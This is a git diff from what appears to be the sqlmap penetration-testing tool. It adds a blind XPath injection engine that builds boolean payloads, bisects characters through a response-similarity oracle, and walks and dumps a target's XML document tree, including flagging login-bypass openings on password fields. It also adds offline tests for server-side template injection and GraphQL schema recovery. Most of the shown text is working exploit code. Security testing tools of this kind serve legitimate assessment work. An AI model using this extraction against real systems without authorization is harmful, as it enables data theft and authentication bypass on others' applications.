+    hasSingle = "'" in s
+    hasDouble = '"' in s
+
+    if not hasSingle:
+        return "'%s'" % s
+    if not hasDouble:
+        return '"%s"' % s
+
+    # Split on the double quotes, wrap every piece in double quotes and re-insert each
+    # double quote as the single-quoted literal '"'
+    pieces = ['"%s"' % part for part in s.split('"')]
+    return "concat(%s)" % ", '\"', ".join(pieces)
+
+
+class _XPathPayloadBuilder(object):
+    """Factory for the boolean predicates used during blind tree-walking. Every public
+    method formats one XPath predicate and returns it wrapped in the injection boundary
+    verified by detection, i.e. a complete parameter value ready to be sent."""
+
+    def __init__(self, original, boundary):
+        self.boundary = boundary
+        # A falsy base value is replaced by the placeholder "x"
+        self.original = original if original else "x"
+
+    def _make(self, predicate):
+        """Wrap `predicate` in the stored boundary around the stored base value."""
+        return _makePayload(self.original, self.boundary, predicate)
+
+    def nameStartsWith(self, path, prefix):
+        predicate = "starts-with(name(%s),%s)" % (path, _xpathQuote(prefix))
+        return self._make(predicate)
+
+    def nameLength(self, path, length):
+        predicate = "string-length(name(%s))=%d" % (path, length)
+        return self._make(predicate)
+
+    def childCount(self, path, count):
+        predicate = "count(%s/*)>=%d" % (path, count)
+        return self._make(predicate)
+
+    def attributeCount(self, path, count):
+        predicate = "count(%s/@*)>=%d" % (path, count)
+        return self._make(predicate)
+
+    def attributeNameStartsWith(self, path, index, prefix):
+        predicate = "starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))
+        return self._make(predicate)
+
+    def attributeValueStartsWith(self, path, index, prefix):
+        predicate = "starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))
+        return self._make(predicate)
+
+    def textStartsWith(self, path, prefix):
+        predicate = "starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))
+        return self._make(predicate)
+
+    def stringLengthAtLeast(self, target, n):
+        predicate = "string-length(%s)>=%d" % (target, n)
+        return self._make(predicate)
+
+    def charPresent(self, target, pos):
+        # Holds when the character at 1-based position `pos` of `target` is a member of
+        # the ordered charset literal, i.e. when its index can be found by bisection
+        predicate = "contains(%s,substring(%s,%d,1))" % (_CS_LITERAL, target, pos)
+        return self._make(predicate)
+
+    def charIndexAtLeast(self, target, pos, n):
+        # XPath 1.0 cannot compare strings with '<', so the character's 0-based charset
+        # index is expressed as the length of the charset prefix in front of it, which
+        # is a number and can be bisected
+        predicate = "string-length(substring-before(%s,substring(%s,%d,1)))>=%d" % (_CS_LITERAL, target, pos, n)
+        return self._make(predicate)
+
+
+def _makeOracle(place, parameter, template):
+ """Build an oracle from a verified true template. extract(payload) returns
+ True when the response is closer to the true template than to the false page.
+
+ The returned callable oracle(payload) is the strict variant (response must match the
+ template); it also exposes .extract, .template, .falsePage and .cache as attributes.
+ Building the oracle issues one request (the SENTINEL value) to obtain the false page."""
+
+ # Responses are memoised per payload, so a repeated probe costs a single request
+ cache = {}
+
+ def request(payload):
+ if payload not in cache:
+ cache[payload] = _send(place, parameter, payload)
+ return cache[payload]
+
+ # Reference false page: the response to the bare sentinel value
+ falsePage = request(SENTINEL)
+
+ def oracle(payload):
+ page = request(payload)
+ # Error pages never count as true
+ if page is None or _isError(page):
+ return False
+ return _ratio(template, page) >= UPPER_RATIO_BOUND
+
+ def extract(payload):
+ page = request(payload)
+ if page is None or _isError(page):
+ return False
+ trueRatio = _ratio(template, page)
+ falseRatio = _ratio(falsePage, page)
+ # Require either an unambiguous match against the template or a
+ # clear separation from the false page (minimum 5 %pt margin)
+ return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05
+
+ # Helpers and state are attached to the function object so callers get a single handle
+ oracle.extract = extract
+ oracle.template = template
+ oracle.falsePage = falsePage
+ oracle.cache = cache
+ return oracle
+
+
+# Frequency-ordered charset for blind character extraction.
+# Excludes characters that are XPath metacharacters or problematic in URL context.
+_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/'))
+# Preferred probing order: lower case, upper case, digits, then a few common symbols
+_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) +
+ tuple(xrange(ord('A'), ord('Z') + 1)) +
+ tuple(xrange(ord('0'), ord('9') + 1)) +
+ tuple(ord(_) for _ in "@._-+ "))
+_CHARSET = []
+# First pass: preferred characters that are in range, not metacharacters and not yet listed
+for _ in _FREQ:
+ if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET:
+ _CHARSET.append(_)
+# Second pass: every remaining in-range, non-meta character, in codepoint order
+for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1):
+ if _ not in _META_ORDS and _ not in _CHARSET:
+ _CHARSET.append(_)
+
+# Codepoint-ordered charset used by the binary-search extractor. Ordering here MUST match
+# the literal string `_CS_LITERAL` so that a recovered index maps back to the right character.
+_CS_ORDS = [_ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1) if _ not in _META_ORDS]
+# Both quote characters are in _META_ORDS, so the charset never contains a quote
+_CS_LITERAL = _xpathQuote("".join(chr(_) for _ in _CS_ORDS))
+
+
+def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
+    """Recover a string one character at a time by linear charset scan.
+
+    `getter(builder, path, prefix)` must return the payload testing whether the value at
+    `path` starts with `prefix`. Recovery stops after `maxLen` characters, when no charset
+    member extends the prefix, or right after a space has been recovered (the value is
+    then right-stripped). Returns the recovered value, or None when it is empty."""
+
+    recovered = ""
+    requests = 0
+
+    for _ in xrange(maxLen):
+        for codepoint in _CHARSET:
+            attempt = recovered + chr(codepoint)
+            requests += 1
+
+            if oracle.extract(getter(builder, path, attempt)):
+                recovered = attempt
+                break
+        else:
+            # No charset member extends the current prefix: value is complete
+            break
+
+        if recovered.endswith(" "):
+            recovered = recovered.rstrip()
+            break
+
+    logger.debug("XPath blind inference: %d probes (length=%d)" % (requests, len(recovered)))
+    return recovered or None
+
+
+def _inferCount(oracle, builder, path, countFn, maxCount=128):
+    """Bisect a count using the monotone predicate "count >= N".
+
+    `countFn(builder, path, n)` returns the payload for "count >= n". Returns 0 when even
+    "count >= 1" fails; counts above `maxCount` are reported as `maxCount`."""
+
+    def atLeast(n):
+        return oracle.extract(countFn(builder, path, n))
+
+    if not atLeast(1):
+        return 0
+
+    low, high = 1, maxCount
+    while low < high:
+        # Upper midpoint, so that `low = middle` always makes progress
+        middle = (low + high + 1) // 2
+        if atLeast(middle):
+            low = middle
+        else:
+            high = middle - 1
+    return low
+
+
+def _inferString(oracle, builder, target, maxLen=XPATH_MAX_LENGTH):
+ """Blindly recover the string value of XPath expression `target` (e.g.
+ "name(/*)" or "string(/*[1]/@*[1])") using binary search.
+
+ The length is bisected first, then each character is resolved by bisecting
+ its index inside the ordered charset. This needs ~log2(len) requests per
+ character versus the linear charset scan in _inferValue(), which matters a
+ lot when walking a whole document tree. Characters outside the charset are
+ surfaced as '?' so the rest of the value is still recovered.
+
+ Returns the recovered string, or None when the value is empty. Values longer than
+ `maxLen` are cut to `maxLen` characters."""
+
+ # Empty value: nothing to recover
+ if not oracle.extract(builder.stringLengthAtLeast(target, 1)):
+ return None
+
+ # Bisect the length; invariant: length >= lo. The upper midpoint guarantees progress
+ lo, hi = 1, maxLen
+ while lo < hi:
+ mid = (lo + hi + 1) // 2
+ if oracle.extract(builder.stringLengthAtLeast(target, mid)):
+ lo = mid
+ else:
+ hi = mid - 1
+ length = lo
+
+ chars = []
+ # Counts character probes only (the length bisection above is not included)
+ probes = 0
+ last = len(_CS_ORDS) - 1
+ for pos in xrange(1, length + 1):
+ probes += 1
+ # Characters outside the charset cannot be bisected; mark them and move on
+ if not oracle.extract(builder.charPresent(target, pos)):
+ chars.append("?")
+ continue
+
+ # Bisect the 0-based index of this character inside the ordered charset
+ clo, chi = 0, last
+ while clo < chi:
+ cmid = (clo + chi + 1) // 2
+ probes += 1
+ if oracle.extract(builder.charIndexAtLeast(target, pos, cmid)):
+ clo = cmid
+ else:
+ chi = cmid - 1
+ chars.append(chr(_CS_ORDS[clo]))
+
+ value = "".join(chars)
+ logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, length))
+ return value or None
+
+
+def _walkTree(oracle, builder, path="/*", depth=0):
+ """Recursively walk the XML tree from a given XPath expression.
+ Returns a dict: {name, path, children, attributes, text} or None.
+
+ None is returned when `depth` exceeds XPATH_MAX_DEPTH or the element name at `path`
+ cannot be recovered. `attributes` is a list of {"name", "value"} dicts; `text` is only
+ extracted for elements without child elements."""
+
+ if depth > XPATH_MAX_DEPTH:
+ return None
+
+ name = _inferString(oracle, builder, "name(%s)" % path)
+ if not name:
+ return None
+
+ logger.info("discovered element: '%s'" % name)
+
+ # At most 32 children and 16 attributes per element are enumerated
+ childCount = _inferCount(oracle, builder, path,
+ lambda b, p, c: b.childCount(p, c),
+ maxCount=32)
+
+ attrCount = _inferCount(oracle, builder, path,
+ lambda b, p, c: b.attributeCount(p, c),
+ maxCount=16)
+
+ attributes = []
+ for i in xrange(1, attrCount + 1):
+ attrName = _inferString(oracle, builder, "name(%s/@*[%d])" % (path, i))
+ # An attribute whose name cannot be recovered is skipped entirely
+ if not attrName:
+ continue
+
+ attrValue = _inferString(oracle, builder, "string(%s/@*[%d])" % (path, i))
+ attributes.append({"name": attrName, "value": attrValue or ""})
+ logger.info(" attribute: @%s='%s'" % (attrName, attrValue or ""))
+
+ # Text is read for leaf elements only; text of elements with children is not extracted
+ text = None
+ if childCount == 0:
+ text = _inferString(oracle, builder, "string(%s)" % path)
+
+ children = []
+ for i in xrange(1, childCount + 1):
+ childPath = "%s/*[%d]" % (path, i)
+ child = _walkTree(oracle, builder, childPath, depth + 1)
+ # Children that could not be walked (depth limit, unreadable name) are dropped
+ if child:
+ children.append(child)
+
+ return {
+ "name": name,
+ "path": path,
+ "children": children,
+ "attributes": attributes,
+ "text": text,
+ }
+
+
+def _treeToTable(node):
+    """Flatten a tree node into (columns, rows) for grid output.
+
+    Rows are emitted in document (pre-order) sequence: one per attribute and one per
+    non-empty text value. Elements carrying neither attributes nor text yield no row."""
+
+    header = ["Path", "Element", "Attribute", "Value"]
+    table = []
+
+    # Explicit stack instead of recursion; children are pushed in reverse so that they
+    # are popped, and therefore listed, in their original order
+    pending = [node]
+    while pending:
+        current = pending.pop()
+        where, tag = current["path"], current["name"]
+
+        for attribute in current.get("attributes", []):
+            table.append([where, tag, "@" + attribute["name"], attribute["value"]])
+
+        if current.get("text"):
+            table.append([where, tag, "text()", current["text"]])
+
+        pending.extend(list(current.get("children", []))[::-1])
+
+    return header, table
+
+
+def _grid(columns, rows):
+    """Render `columns` (header cells) and `rows` as an ASCII grid. Every column is as
+    wide as its widest cell; cells missing from a short row are rendered empty."""
+
+    header = [getUnicode(_) for _ in columns]
+    body = [[getUnicode(_) for _ in row] for row in rows]
+
+    widths = []
+    for position, caption in enumerate(header):
+        present = [len(getUnicode(row[position])) for row in body if position < len(row)]
+        widths.append(max([len(caption)] + present))
+
+    rule = "+-" + "-+-".join("-" * _ for _ in widths) + "-+"
+
+    def render(cells):
+        padded = []
+        for position in xrange(len(header)):
+            cell = getUnicode(cells[position]) if position < len(cells) else ""
+            padded.append(cell.ljust(widths[position]))
+        return "| " + " | ".join(padded) + " |"
+
+    lines = [rule, render(header), rule]
+    lines.extend(render(row) for row in body)
+    lines.append(rule)
+    return "\n".join(lines)
+
+
+def _dumpTable(title, columns, rows):
+    """Print `title` followed by the rendered grid through conf.dumper; an empty row
+    list prints nothing."""
+    if not rows:
+        return
+    conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows)))
+
+
+def xpathScan():
+ """Entry point for '--xpath'. For every candidate parameter: probe the parser for a
+ backend hint, then try to establish a boolean oracle. Parameters with an extractable
+ boundary are collected as slots; detection-only findings are reported immediately.
+ The first slot is then used to walk and dump the reachable XML tree. Returns None."""
+ global SENTINEL
+ # Rebind the module-level sentinel so every scan works with a fresh random token
+ SENTINEL = randomStr(length=10, lowercase=True)
+
+ debugMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
+ debugMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
+
+ if not conf.paramDict:
+ logger.error("no request parameters to test (use --data, GET params, or similar)")
+ return
+
+ # tested: parameters probed; found: parameters with a confirmed boolean oracle
+ # (extractable or detection-only); slots: the extractable subset
+ tested = found = 0
+ slots = []
+
+ # Only places listed in XPATH_PLACES that actually occur in the request are scanned
+ for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict):
+ for parameter in list(conf.paramDict[place].keys()):
+ # Honour an explicit parameter selection when one was given
+ if conf.testParameter and parameter not in conf.testParameter:
+ continue
+
+ tested += 1
+ logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))
+
+ # Phase 1: Probe the XPath parser for a backend hint
+ backendHint, _errorPayload = _probeBackendByParserError(place, parameter)
+ if backendHint:
+ backendHint = _fingerprintByError(backendHint)
+
+ # Phase 2: Establish a boolean oracle (authoritative)
+ template, payload, boundary = _detectBoolean(place, parameter)
+ if template:
+ if boundary and boundary.extractable:
+ found += 1
+ backend = backendHint or "Generic XPath"
+ logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))
+ if conf.beep:
+ beep()
+
+ oracle = _makeOracle(place, parameter, template)
+ slots.append(Slot(place=place, parameter=parameter, backend=backend,
+ oracle=oracle, template=template, payload=payload,
+ boundary=boundary))
+ continue
+
+ # Detection-only: boolean differentiation confirmed but no extraction boundary.
+ # Report as auth bypass on credential fields; log generically otherwise.
+ found += 1
+ if _isPasswordParam(parameter):
+ title = "XPath auth bypass"
+ logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
+ else:
+ title = "XPath boolean-based blind (detection-only)"
+ logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))
+ if conf.beep:
+ beep()
+ conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))
+ continue
+
+ # No oracle, but the parser error probe still produced a hint worth mentioning
+ if backendHint:
+ logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))
+
+ # Nothing to extract from: summarise and stop
+ if not slots:
+ if found:
+ logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
+ logger.info("XPath scan complete")
+ return
+ if tested:
+ warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested
+ else:
+ warnMsg = "no parameters found to test for XPath injection"
+ logger.warning(warnMsg)
+ return
+
+ # Select the first oracle-bearing slot with an extractable boundary for tree-walking
+ slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None)
+ if not slot:
+ logger.info("XPath scan complete")
+ return
+
+ original = _originalValue(slot.place, slot.parameter) or "x"
+ # OR-style boundaries always-true if the original branch matches, so use a
+ # sentinel that is guaranteed not to appear as a field value. AND-style
+ # boundaries need the original branch to match; keep the original there.
+ if " or " in slot.boundary.prefix:
+ base = SENTINEL
+ else:
+ base = original
+ builder = _XPathPayloadBuilder(base, slot.boundary)
+ oracle = slot.oracle
+
+ # Refine backend fingerprint if generic
+ if not slot.backend or slot.backend == "Generic XPath":
+ backend = _backendFromError(oracle.template)
+ if backend:
+ backend = _fingerprintByError(backend)
+ if backend:
+ logger.info("identified back-end: '%s'" % backend)
+ slot = slot._replace(backend=backend)
+
+ title = "XPath boolean-based blind"
+ conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload))
+
+ # Blind XML tree-walking (attempted document-root traversal)
+ logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
+ root = _walkTree(oracle, builder)
+
+ if root:
+ columns, rows = _treeToTable(root)
+ # NOTE(review): the figure logged here is the number of table rows returned by
+ # _treeToTable(), not the number of elements walked
+ logger.info("extracted %d node(s) from XML tree" % (len(rows)))
+ _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)
+ else:
+ warnMsg = "XPath injection is confirmed but the XML tree could not be walked. "
+ warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
+ logger.warning(warnMsg)
+
+ logger.info("XPath scan complete")
diff --git a/tests/_testutils.py b/tests/_testutils.py
index 7ec9a4e3b4..781f54749a 100644
--- a/tests/_testutils.py
+++ b/tests/_testutils.py
@@ -73,6 +73,15 @@ def bootstrap():
import logging
logging.getLogger("sqlmapLog").setLevel(logging.CRITICAL + 1)
+ # Some console output bypasses the logger entirely and goes straight through dataToStdout():
+ # the \r-progress lines ("[INFO] retrieved: ...", "[INFO] cracked password ..."), and the echo
+ # of batch-auto-answered readInput() prompts (the fingerprint-mismatch prompt, the LIKE/exact
+ # and common-wordlist choices, ...). dataToStdout() writes only when output is forced or when
+ # kb.wizardMode is False, and readInput() echoes with forceOutput=not kb.wizardMode - so setting
+ # wizardMode keeps the unittest report to just dots. wizardMode is read ONLY by dataToStdout/
+ # readInput (plus the interactive wizard flow, unused here), so this has no effect on results.
+ kb.wizardMode = True
+
sys.argv = _orig_argv # restore so unittest's arg parsing works
_BOOTSTRAPPED = True
diff --git a/tests/test_checks.py b/tests/test_checks.py
index d0fe284c9d..7300c39bb7 100644
--- a/tests/test_checks.py
+++ b/tests/test_checks.py
@@ -49,7 +49,7 @@
# test never leaks state into another test or the rest of the suite.
_CONF_KEYS = (
"paramDict", "parameters", "url", "hostname", "method", "skipHeuristics",
- "prefix", "suffix", "nosql", "graphql", "ldap", "beep", "string",
+ "prefix", "suffix", "nosql", "graphql", "ldap", "xpath", "ssti", "beep", "string",
"notString", "regexp", "regex", "dummy", "offline", "skipWaf", "data",
"hashDB", "cj", "cookie", "dropSetCookie", "httpHeaders", "proxy", "tor",
"tamper", "timeout", "retries", "textOnly", "ignoreCode", "disablePrecon",
@@ -177,7 +177,7 @@ def setUp(self):
conf.parameters = {PLACE.GET: "id=1"}
conf.url = "http://test.invalid/index.php?id=1"
conf.method = None
- conf.nosql = conf.graphql = conf.ldap = False
+ conf.nosql = conf.graphql = conf.ldap = conf.xpath = conf.ssti = False
conf.beep = False
kb.heavilyDynamic = False
kb.dynamicParameter = False
diff --git a/tests/test_graphql.py b/tests/test_graphql.py
index 753c5dba3a..5be9d901b8 100644
--- a/tests/test_graphql.py
+++ b/tests/test_graphql.py
@@ -727,5 +727,67 @@ def test_cell_unicode(self):
self.assertIn("caf", gi._cell(u"caf\xe9"))
+class TestGraphqlSuggestionRecovery(unittest.TestCase):
+ """G1: schema recovery from 'Did you mean' suggestions when introspection is disabled."""
+
+ def setUp(self):
+ self._gql = gi._gqlSend
+
+ def tearDown(self):
+ gi._gqlSend = self._gql
+
+ def test_harvest_suggestions_both_quote_styles(self):
+ # graphql-js uses double quotes; some servers use single quotes + Oxford 'or'
+ self.assertEqual(
+ gi._harvestSuggestions('Cannot query field "x" on type "Query". Did you mean "user" or "search"?'),
+ ["user", "search"])
+ self.assertEqual(
+ gi._harvestSuggestions("Cannot query field 'x' on type 'Query'. Did you mean 'user', 'me', or 'node'?"),
+ ["user", "me", "node"])
+ self.assertEqual(gi._harvestSuggestions("no suggestion here"), [])
+
+ def test_suggest_fields_from_validation_errors(self):
+ # An unknown field elicits the closest real field names (graphql-js phrasing)
+ def fake(endpoint, query, variables=None):
+ if "{ user }" in query or "{user}" in query:
+ return '{"data":{"user":null}}', 200 # 'user' is a real (resolving) field
+ return ('{"errors":[{"message":"Cannot query field \\"%s\\" on type \\"Query\\". '
+ 'Did you mean \\"user\\", \\"search\\" or \\"login\\"?"}]}'
+ % "zz", 200)
+ gi._gqlSend = fake
+ fields = gi._suggestFields("http://t/graphql", "query")
+ for expected in ("user", "search", "login"):
+ self.assertIn(expected, fields)
+
+ def test_suggest_args_from_unknown_argument(self):
+ def fake(endpoint, query, variables=None):
+ return ('{"errors":[{"message":"Unknown argument \\"zz\\" on field \\"Query.user\\". '
+ 'Did you mean \\"username\\"?"}]}', 200)
+ gi._gqlSend = fake
+ self.assertIn("username", gi._suggestArgs("http://t/graphql", "query", "user"))
+
+ def test_introspect_via_suggestions_builds_slots(self):
+ def fake(endpoint, query, variables=None):
+ # introspection-style queries already filtered upstream; here every unknown field
+ # yields the same suggestion set, and 'search' resolves as a real field
+ if "{ search }" in query or "{search}" in query:
+ return '{"data":{"search":[]}}', 200
+ if "Unknown argument" in query: # never matches; args fall back to wordlist
+ return '{}', 200
+ return ('{"errors":[{"message":"Cannot query field \\"zz\\" on type \\"Query\\". '
+ 'Did you mean \\"search\\"?"}]}', 200)
+ gi._gqlSend = fake
+ slots = gi._introspectViaSuggestions("http://t/graphql")
+ self.assertIsNotNone(slots)
+ self.assertTrue(any(s.fieldName == "search" for s in slots))
+ self.assertTrue(all(s.strategy == "string" for s in slots))
+
+ def test_introspect_via_suggestions_none_without_suggestions(self):
+ def fake(endpoint, query, variables=None):
+ return '{"errors":[{"message":"Syntax Error: unexpected token"}]}', 200
+ gi._gqlSend = fake
+ self.assertIsNone(gi._introspectViaSuggestions("http://t/graphql"))
+
+
if __name__ == "__main__":
unittest.main()
diff --git a/tests/test_hash_crack.py b/tests/test_hash_crack.py
index 4e9e067ff3..3d61d00d14 100644
--- a/tests/test_hash_crack.py
+++ b/tests/test_hash_crack.py
@@ -77,7 +77,18 @@ def setUp(self):
conf.hashDB = None
kb.wordlists = [self.wordlist]
+ # cracking prints "[INFO] cracked password ..." via dataToStdout(forceOutput=True), which
+ # bypasses both the logger and kb.wizardMode suppression; redirect stdout so the unittest
+ # report stays clean (these tests assert on return values/kb, never on console output).
+ self._saved_stdout = sys.stdout
+ sys.stdout = open(os.devnull, "w")
+
def tearDown(self):
+ if getattr(self, "_saved_stdout", None) is not None:
+ try:
+ sys.stdout.close()
+ finally:
+ sys.stdout = self._saved_stdout
conf.disableMulti = self._saved["disableMulti"]
conf.hashDB = self._saved["hashDB"]
conf.hashFile = self._saved["hashFile"]
diff --git a/tests/test_ssti.py b/tests/test_ssti.py
new file mode 100644
index 0000000000..02ff44f35a
--- /dev/null
+++ b/tests/test_ssti.py
@@ -0,0 +1,611 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline tests for the SSTI detection and fingerprinting engine. Mock _send() stands
+in for the HTTP/Jinja2 layer so engine table integrity, arithmetic proof, error
+detection, boolean oracle, distinguishing probes, and fingerprinting can be
+exercised without a live target.
+"""
+
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.ssti.inject as ssti
+
+
+SENTINEL = ssti.SENTINEL
+
+
+class TestHelpers(unittest.TestCase):
+ def test_ratio(self):
+ self.assertGreater(ssti._ratio("abc", "abc"), 0.9)
+ self.assertLess(ssti._ratio("abc", "xyz"), 0.5)
+
+ def test_delim(self):
+ from lib.core.enums import PLACE
+ self.assertEqual(ssti._delim(PLACE.GET), '&')
+ self.assertEqual(ssti._delim(PLACE.COOKIE), ';')
+
+
+class TestEngineTable(unittest.TestCase):
+ def test_all_engines_have_required_fields(self):
+ for engine in ssti._ENGINE_TABLE:
+ self.assertTrue(len(engine.name) > 0)
+ self.assertTrue(len(engine.delimiter) > 0)
+
+ def test_arithmetic_engines_have_format_strings(self):
+ noArith = ("Velocity", "Handlebars")
+ for engine in ssti._ENGINE_TABLE:
+ if engine.name not in noArith:
+ self.assertIn("%d", engine.arithmeticFmt,
+ "Engine '%s' arithmeticFmt must contain %%d placeholders" % engine.name)
+
+ def test_error_probes_present(self):
+ for engine in ssti._ENGINE_TABLE:
+ if engine.errorRegex:
+ self.assertTrue(len(engine.errorProbes) > 0,
+ "Engine '%s' has errorRegex but no errorProbes" % engine.name)
+
+ def test_distinguishing_probes_for_curly_engines(self):
+ curlyEngines = [e for e in ssti._ENGINE_TABLE if e.delimiter == "{{"]
+ withProbes = [e for e in curlyEngines if e.distinguishingProbe]
+ # Jinja2 and Twig are distinguished by trueRendered/falseRendered;
+ # Twig/Handlebars have distinguishing probes. At least one curly engine
+ # must have a probe, but Jinja2 can rely on boolean rendering difference.
+ self.assertGreaterEqual(len(withProbes), 1,
+ "At least one {{}}-delimited engine needs a distinguishing probe")
+
+ def test_boolean_payloads_differ(self):
+ for engine in ssti._ENGINE_TABLE:
+ self.assertNotEqual(engine.booleanTrue, engine.booleanFalse,
+ "Engine '%s' true/false payloads must differ" % engine.name)
+ if engine.trueRendered:
+ self.assertNotEqual(engine.trueRendered, engine.falseRendered,
+ "Engine '%s' true/false rendered values must differ" % engine.name)
+
+
+class TestArithmeticDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_arithmetic_control_pair(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+
+ def mock(place, parameter, value):
+ import re
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ a, b = int(m.group(1)), int(m.group(2))
+ return "Hello %d" % (a * b)
+ return "Hello " + value
+
+ ssti._send = mock
+ self.assertTrue(ssti._probeArithmetic("GET", "q", engine))
+
+ def test_arithmetic_requires_both_results_correct(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello 42" # always returns 42 regardless of payload
+
+ ssti._send = mock
+ # Control pair check: result1 must NOT appear in page2 and vice versa
+ self.assertFalse(ssti._probeArithmetic("GET", "q", engine))
+
+ def test_handlebars_skipped(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Handlebars"][0]
+ self.assertFalse(ssti._probeArithmetic("GET", "q", engine))
+
+
+class TestErrorDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_error_detected(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ if "{{" in value and "unknown" in value:
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected '}'"
+ return "Hello " + value
+
+ ssti._send = mock
+ page = ssti._probeError("GET", "q", engine)
+ self.assertIsNotNone(page)
+
+ def test_no_error_on_normal_response(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello " + value
+
+ ssti._send = mock
+ page = ssti._probeError("GET", "q", engine)
+ self.assertIsNone(page)
+
+ def test_backend_from_error(self):
+ page = "jinja2.exceptions.UndefinedError: 'foo' is undefined"
+ backend = ssti._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+
+class TestDistinguishingProbes(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_no_distinguishing_probe(self):
+ engine = ssti._ENGINE_TABLE[0] # Jinja2
+ self.assertFalse(engine.distinguishingProbe,
+ "Jinja2 uses trueRendered/falseRendered for disambiguation, not a separate probe")
+
+ def test_no_distinguishing_without_probe(self):
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Pug/Jade"][0]
+ self.assertFalse(ssti._probeDistinguishing("GET", "q", engine))
+
+ def test_comment_probe_reflection_rejected(self):
+ """Comment-style probe reflected verbatim must not pass."""
+ engine = [e for e in ssti._ENGINE_TABLE if e.name == "Freemarker"][0]
+
+ def mock(place, parameter, value):
+ if "<#--" in value:
+ return "Hello <#-- freemarker -->" # raw reflection
+ return "Hello " + value
+
+ ssti._send = mock
+ self.assertFalse(ssti._probeDistinguishing("GET", "q", engine))
+
+
+class TestBooleanDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_boolean(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ if "True" in value:
+ return "Hello True"
+ elif "False" in value:
+ return "Hello False"
+ return "Hello " + value
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNotNone(template)
+
+ def test_no_boolean_when_true_false_same(self):
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "same response"
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNone(template)
+
+ def test_plain_reflection_rejected(self):
+ """Raw payload reflection must not pass boolean detection."""
+ engine = ssti._ENGINE_TABLE[0]
+
+ def mock(place, parameter, value):
+ return "Hello " + value # reflects payload verbatim
+
+ ssti._send = mock
+ template = ssti._detectBoolean("GET", "q", engine)
+ self.assertIsNone(template)
+
+
+class TestFingerprint(unittest.TestCase):
+ def setUp(self):
+ self.original_send = ssti._send
+
+ def tearDown(self):
+ ssti._send = self.original_send
+
+ def test_jinja2_fingerprinted_with_arith_and_boolean(self):
+ import re
+
+ def mock(place, parameter, value):
+ m = re.search(r"\{\{ (\d+)\*(\d+)", value)
+ if m:
+ return "Hello %d" % (int(m.group(1)) * int(m.group(2)))
+ if "True" in value:
+ return "Hello True" # Jinja2-style boolean rendering
+ if "False" in value:
+ return "Hello False"
+ if "unknown|filter" in value:
+ return "jinja2.exceptions.TemplateSyntaxError: unexpected '}'"
+ return "Hello " + value
+
+ ssti._send = mock
+ engine, evidence = ssti._fingerprint("GET", "q")
+ self.assertIsNotNone(engine)
+ self.assertIn("Jinja2", engine.name)
+ self.assertTrue(evidence.get("arithmetic"))
+ self.assertTrue(evidence.get("boolean"))
+
+
